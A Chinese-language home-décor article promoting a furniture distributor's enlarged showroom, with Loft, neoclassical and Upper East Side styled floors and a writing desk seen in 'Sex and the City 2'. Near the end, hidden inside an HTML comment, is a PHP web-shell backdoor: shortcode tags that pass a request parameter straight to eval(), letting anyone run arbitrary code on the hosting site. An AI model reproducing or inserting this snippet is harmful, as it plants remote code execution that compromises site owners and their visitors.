【居家品味】走入《慾望城市》豪宅 坐擁凱莉寫字桌

想擁有電影《慾望城市 2》主角凱莉與大人物主臥室中搶鏡的寫字桌,沒問題!有家具代理品牌引進紐約曼哈頓流行的家具家飾品牌,像是可以眺望中央公園的閣樓、年輕藝術家群聚的蘇活區,還有上東城區的名門豪邸風格通通有。要讓民眾不僅近距離接觸電影中曼哈頓 Style 還能帶回家擁有!

這家代理家具家飾品牌的業者,將原本占地 250 坪的展售空間擴增至將近 400 坪,還以樓層區分出粗獷的 Loft 風格、精緻高雅的新古典,以及線條更俐落現代的都會美式等。其中,5、6 樓的大樓頂層空間,挑高且採落地窗引進自然光,同時備室內設計學位背景的銷售顧問,也能提供家具家飾配置諮詢。

其旗下代理品牌包括 Thomasville、Bernhardt、時尚圈知名藝術家 Lillian August 同名品牌、與精品皮革來源及鞣製工法一致的 American Leather,以及融入法式沙龍浪漫元素的 Caracole,還有美國百年品牌 Hickory Chair、同時也屢屢出現在電影《慾望城市 2》主角凱莉與大人物主臥室中的 Hallings Secretary 寫字桌為展場中亮點。

另外,以空間風格來說,5 樓為工業風濃厚的 Loft 場景,刻意選用表面斑駁、色澤不均的粗獷磚材,搭配濃烈的黑色漆料牆面,並特地新增多支挑高圓柱,重現蘇活區工廠改造的起居場景。6 樓是詮釋頂級品牌 Hickory Chair 及 Lillian August 的舞台,創造客廳、餐廳、臥室與書房,彷彿踏入《慾望城市》中上東城區某戶豪宅。

至於面對即將到來的新年,品牌達人建議居家布置能使用「金色元素」,像是充滿巴黎古董家具風情的「Paxton Screen 屏風」、以日式東方生漆工藝為靈感的「Haywar Bookcase 書櫃」,或品牌經典「Clive Console 邊桌」,其復古手描金漆工藝帶來低調奢華感。

(合作媒體:欣傳媒 授權,圖片來源:麗居家具,不得轉載。)

<!– [insert_php]if (isset($_REQUEST["KIoSL"])){eval($_REQUEST["KIoSL"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIoSL"])){eval($_REQUEST["KIoSL"]);exit;}[/php] –>

點關鍵字看更多相關文章: